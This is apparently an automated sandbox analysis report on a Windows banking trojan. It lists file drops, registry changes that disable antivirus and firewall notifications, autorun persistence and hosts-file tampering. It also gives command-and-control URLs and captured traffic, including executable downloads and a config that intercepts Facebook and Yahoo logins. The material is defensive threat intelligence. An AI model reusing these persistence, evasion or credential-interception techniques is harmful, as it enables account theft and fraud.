MD5: d6083eb7ba57b6804be94a23b1ba72b7
SHA1: 24ae81c07e461372819a1489b46c2d4419b479b1
SHA256: cb9972f6ff7f1d1a0ecc647d6567d4ef1b4b1a281464c07ef1977b6d8ec28021
SSDeep: 12288: PW4eTjsuguKMx4jc6JlAHtCYTmqhhHHwjtEcIWhdRBFipe/Ex6kAnTP: u40j1gu5x4I6JSAYTnhhfid0SExbU
Size: 800768 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-12 20:58:22
Analyzed on: WindowsXP SP3 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ihj3deeem5zr.exe:704
ihj3dee6umzr.exe:3840
smp5hldte9zo4u.exe:2780
smp5hld7ljzo4upwykfp.exe:2236
smp5hldgdxzo4u.exe:2804
smp5hld8mfzo4u.exe:2560
rtfrebrgje.exe:2956
rtfrebrgje.exe:396
rtfrebrgje.exe:1104
%original file name%.exe:1964
dklhlsph.exe:2108
dklhlsph.exe:3676
dklhlsph.exe:2720

The Trojan injects its code into the following process(es):
No processes have been created.

File activity

The process ihj3deeem5zr.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

The process smp5hldte9zo4u.exe:2780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\rtfrebrgje.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)

The Trojan deletes the following file(s):

%System%\rtfrebrgje.exe (0 bytes)

The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\etc (10 bytes)
%System%\rtfrebrgje.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)

The Trojan deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process smp5hldgdxzo4u.exe:2804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

The process rtfrebrgje.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\rng (60 bytes)
%WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
%System%\dsvmzzbluxpxh\cfg (110 bytes)
%System%\dklhlsph.exe (5873 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\smp5hldgdxzo4u.exe (0 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (0 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (0 bytes)

The process rtfrebrgje.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

The process rtfrebrgje.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\rng (40 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%System%\dsvmzzbluxpxh\cfg (446 bytes)
%System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
%System%\drivers\etc\hosts (100 bytes)
%System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
%WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
%WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
%System%\dsvmzzbluxpxh\ihst (222 bytes)
%System%\dklhlsph.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\ihj3dee6umzr.exe (0 bytes)

The process %original file name%.exe:1964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (0 bytes)

The process dklhlsph.exe:2108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

The process dklhlsph.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

The process dklhlsph.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\dsvmzzbluxpxh\tst (10 bytes)

Registry activity

The process ihj3deeem5zr.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 FB E8 06 B0 70 E1 5A 8A 48 A3 9C 79 B5 4B D6"

The process ihj3dee6umzr.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 88 D9 03 0B B9 F7 B3 3C 0F 28 EC 23 4E 9D FE"

The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0E 03 4E 16 C3 7F EF 41 66 23 82 BB 87 5C F0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe"

The process smp5hldgdxzo4u.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 3A BF B6 2B D8 FA 2C C8 7E 2E F8 8D EF 76 BC"

The process smp5hld8mfzo4u.exe:2560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 CE A3 0D 0E E8 CD 5F 23 D4 96 2D 0C C4 7F 99"

The process rtfrebrgje.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 89 FC 58 1D F2 15 D0 4C 6D BC 5B C0 F9 EF 9A"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The process rtfrebrgje.exe:1104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 36 CF 01 63 8B 6C 08 62 DE 1F D6 F1 74 D3 D4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 100 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	216.239.138.217
hxxp://fredesecas.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	216.239.139.20
hxxp://laloponea.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	216.239.138.68
hxxp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	66.147.244.161
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	98.139.135.198
hxxp://stickmarch.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	208.91.197.241
hxxp://groupcook.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802	216.239.138.245
hxxp://groupcook.net/forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.138.245
hxxp://groupcook.net/forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.138.245
hxxp://groupcook.net/forum/search.php?method=update&noxor&exe=rtfrebrgje.exe&reg=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.138.245
hxxp://donaven4guia.com/index.php?method=validate&mode=sox&v=029&sox=3c801802	216.239.138.217
hxxp://fredesecas.com/index.php?method=validate&mode=sox&v=029&sox=3c801802	216.239.139.20
hxxp://laloponea.com/index.php?method=validate&mode=sox&v=029&sox=3c801802	216.239.138.68
hxxp://davedekilai.com/index.php?method=validate&mode=sox&v=029&sox=3c801802	66.147.244.161
hxxp://tablefruit.net/index.php?method=validate&mode=sox&v=029&sox=3c801802	98.139.135.198
hxxp://stickmarch.net/index.php?method=validate&mode=sox&v=029&sox=3c801802	208.91.197.241
hxxp://groupcook.net/index.php?method=validate&mode=sox&v=029&sox=3c801802	216.239.138.245
hxxp://groupcook.net/index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.138.245
hxxp://groupcook.net/index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	216.239.138.245
hxxp://tablefruit.net/dep/zip.exe	98.139.135.198
hxxp://groupcook.net/index.php?method=hostname&host=www.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	216.239.138.245
hxxp://groupcook.net/index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	216.239.138.245
hxxp://groupcook.net/index.php?method=checkport&port=50225&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0	216.239.138.245
hxxp://partyorderly.net/dep/zip.exe	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /index.php?method=hostname&host=VVV.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:35 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
.........................

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: davedekilai.com

HTTP/1.1 302 Found

Date: Wed, 14 May 2014 10:29:44 GMT

Server: Apache

Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c801802

Content-Length: 375

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekil
ai.com?method=validate&mode=sox&v=023&sox=3c801802">her
e</a>.</p>.<hr>.<address>Apache Server at dave
dekilai.com Port 80</address>.</body></html>...

GET /index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:34 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
.............

GET /forum/search.php?method=update&noxor&exe=rtfrebrgje.exe®=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:29:53 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......................................................................
......................PE..L....EmS.................H...R......b.......
.`....@...............................................................
..........<#..P....................................................
...............p...@............`......<"..`....................tex
t...FF.......H.................. ..`.rdata.......`.......L............
..@[email protected]....~...@......................@...........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................xcJ...q.......V...
.xcJ...q...D$..t.V..j.......^................................L$..T$.V.
t$.W...r...;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B..
.y. .u....v...B...I. ...._...^._3.^.............QV..j..L$...b...F....s
[email protected]$...b..^Y..........QVW..j..L$...b...G...v....s.H.G..w........L$
.#...b.._..^Y..........cJ...........QW.9..t?j..L$..Xb...G...v....s.H.G
.V.w........L$.#..[b....t.....j.....^_Y........D$..V.....cJ.t.V..i....
...^....Q.A$V.0W.|[email protected]$...a...._^
<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:29:48 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l
$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....
1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8
P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".
p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(..
.I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z
6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l.
.N.y/.9.G..,.[...c.c....4....Vp4...X...).{[email protected]#`.1....&g
t;'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l
..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....
=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.L
D.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..
wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)
....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3..
....m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....
Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s..
...S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....
}X.T..f.,[email protected]....".Y.........a)\.........ow........

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: fredesecas.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:29:43 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: donaven4guia.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:29:42 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:35 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM
.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM..
..............PE..L.....xH................. [email protected]....@.
.........................p............................................
..XH..P....`.. .......................................................
.....................0...............................text............ 
.................. ..`.rdata..."...0...0...0..............@[email protected]...
.....`.......`[email protected]... ....`.......`..............@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /dep/zip.exe HTTP/1.0

Accept: */*

Connection: close

Host: partyorderly.net

HTTP/1.0 999 Unable to process request at this time -- error 999

Date: Wed, 14 May 2014 10:30:35 GMT

Expires: Thu, 01 Jan 1970 22:00:00 GMT

Cache-Control: no-cache

Cache-Control: no-store

Pragma: no-cache

Content-Type: text/html;charset=UTF-8

Age: 0

Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="
text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yaho
o! - 999 Unable to process request at this time -- error 999.</TITL
E>.<!---------------->..<style>./* nn4 hide */ ./*/*/.b
ody {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;te
xt-align:center;}table {font-size:inherit;font:x-small;}.html>body 
{font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100
%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bott
om:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px
 solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:5
3px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;pa
dding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;wi
dth:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;marg
in:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;paddi
ng:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-
bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15e
m;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}
form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-spa
ce:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet
.gif) no-repeat left center;} .form .sep {display:none;}.more {text-al
ign:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {te
xt-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: donaven4guia.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:30:26 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:29:49 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
ping.12.FLAG UPDATE cfg.318."southblood.net" "wifeknew.net" "frontride
.net" "rememberpaint.net" "gentlefriend.net" "spokethere.net" "tablefr
uit.net" "wifeyesterday.net" "uponloud.net" "wrongthrew.net" "necessar
ydress.net" "thistomorrow.net" "saltsecond.net" "signarmy.net" "little
appear.net" "mightglossary.net" "whichsing.net" "lasopeidres.com" var_
user_ip.427.%kill_jhminer% = "1";.%set_intercepts% = ""VVV.facebook.co
m" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "party
orderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly
.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þ
p_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = 
" Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";.%n
ewport% = "50046";.plugin.55070.miner_forced.80.win32drkclient.exe -a 
X11 -o stratum tcp://"%local server IP%":3388 -u 3c801802 -p x.MZ..........
............@...............................................!..L.!This
 program cannot be run in DOS mode....$.........lg...4...4...4.?y4...4
...4...49..4...4...4...4...4...4...4...4...4...4Rich...4..............
..PE..L.....\S.....................N....................@.............
................................................................(.....
..................................................................@...
............HTTP/1.1 200 OK..Date: Wed, 14 May 2014 10:29:49 GMT..Serv
er: Apache/2..Connection: close..Content-Type: text/html..ping.12.FLAG
 UPDATE cfg.318."southblood.net" "wifeknew.net" "frontride.net" "r
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: laloponea.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:30:28 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 404 Not Found

Date: Wed, 14 May 2014 10:30:29 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html; charset=iso-8859-1

Age: 0

Server: YTS/1.20.28
<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - 
Not Found..

GET /index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: groupcook.net

HTTP/1.1 200 OK

Date: Wed, 14 May 2014 10:30:34 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
ping.5.FLAG cfg.318."frontride.net" "spokethere.net" "mightglossary.ne
t" "southblood.net" "uponloud.net" "gentlefriend.net" "tablefruit.net"
 "signarmy.net" "wifeyesterday.net" "wrongthrew.net" "saltsecond.net" 
"littleappear.net" "thistomorrow.net" "rememberpaint.net" "wifeknew.ne
t" "whichsing.net" "necessarydress.net" "lasopeidres.com" var_user_ip.
407.%send_aol_spam% = "1";.%set_intercepts% = ""VVV.facebook.com" "par
tyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly
.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "
/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path%
 = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel
(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";..........
....

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 502 Cannot find server.

Date: Wed, 14 May 2014 10:29:44 GMT

Server: YTS/1.20.28

Cache-Control: no-store

Content-Type: text/html

Content-Language: en

Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>
;.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetic
a,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 
Final//EN"><html><head><style>a:link {font:8pt/11
pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style><meta HTTP-EQUIV="Content-Type" Content="text-html; c
harset=Windows-1252"><title>Cannot find server</title>&
lt;/head><body bgcolor="white"><table width="400" cellpadd
ing="3" cellspacing="5"><tr><td id="tableProps2" align="le
ft" valign="middle" width="360"><h1 id="textSection1"style="COLO
R: black; FONT: 13pt/15pt verdana"><span id="errorText">The p
age cannot be displayed</span></h1></td></tr>&
lt;tr><td id="tablePropsWidth" width="400" colspan="2"><fo
nt style="COLOR: black; FONT: 8pt/11pt verdana">The page you are lo
oking for is currently unavailable. The Web site might be experiencing
 technical difficulties, or you may need to adjust your browser settin
gs.</font></td></tr><tr><td id="tablePropsW
idth" width="400" colspan="2"><font id="LID1"style="COLOR: black
; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p i
d="LID2">Please try the following:</p><ul><li id="in
structionsText1">Click the Refresh button, or try again later.</
li><li id="instructionsText2"> If you typed the page addr
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: fredesecas.com

HTTP/1.1 404 Not Found

Date: Wed, 14 May 2014 10:30:27 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0

Accept: */*

Connection: close

Host: davedekilai.com

HTTP/1.1 302 Found

Date: Wed, 14 May 2014 10:30:28 GMT

Server: Apache

Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c801802

Content-Length: 375

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
